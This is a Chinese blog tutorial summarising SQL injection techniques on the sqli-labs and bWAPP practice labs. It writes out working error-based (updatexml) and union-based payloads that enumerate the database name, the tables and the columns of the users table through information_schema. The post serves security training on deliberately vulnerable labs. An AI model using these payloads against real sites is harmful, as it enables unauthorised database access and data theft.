sqli-labs注入方法总结_sqli-labs的使用-优快云博客

本文链接：https://blog.youkuaiyun.com/wutiangui/article/details/133212164

文章目录

一、测试流程
二、报错注入
三、登录框注入
四、联合注入
五、盲注
六、外带注入

一、测试流程

1.有报错和回显时的注入

如果有回显(F12看respone)可以用union,然后逐个测试几个显示位，然后替换显示位为我们想看的数据，如
先验证是否有报错注入
2’ and updatexml(1,concat(0x7e,(SELECT database())),0x7e)#
在这里插入图片描述

Iron Man’ union select 1,2,3,4,5,6,7#,测试发现有7列
在这里插入图片描述

然后替换数据
Iron Man’ union select 1,user(),database(),version(),4,5,6#
在这里插入图片描述

拿到数据库名之后接下来拿表名
原始语句是
select table_name FROM information_schema.tables WHERE table_schema = ‘bwapp’;
在这里插入图片描述

或者合并起来
select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema = ‘bwapp’ limit 0,1;
在这里插入图片描述

注入语句是：
Iron Man’ union select 1,user(),database(),version(),(select table_name FROM information_schema.tables WHERE table_schema = ‘bwapp’ limit 0,1),5,6#
在这里插入图片描述

修改limit后面的值可以看其他表名
Iron Man’ union select 1,user(),database(),version(),(select table_name FROM information_schema.tables WHERE table_schema = ‘bwapp’ limit 3,1),5,6#
在这里插入图片描述

接下来取users的列名
原始语句是
select column_name from information_schema.columns where table_name=‘users’ and table_schema=“bwapp”;
在这里插入图片描述

合并后
select group_concat(column_name) from information_schema.columns where table_name=‘users’ and table_schema=“bwapp”;
在这里插入图片描述

注入语句是：
Iron Man’ union select 1,user(),database(),version(),(select column_name from information_schema.columns where table_name=‘users’ and table_schema=“bwapp” limit 2,1),5,6#
在这里插入图片描述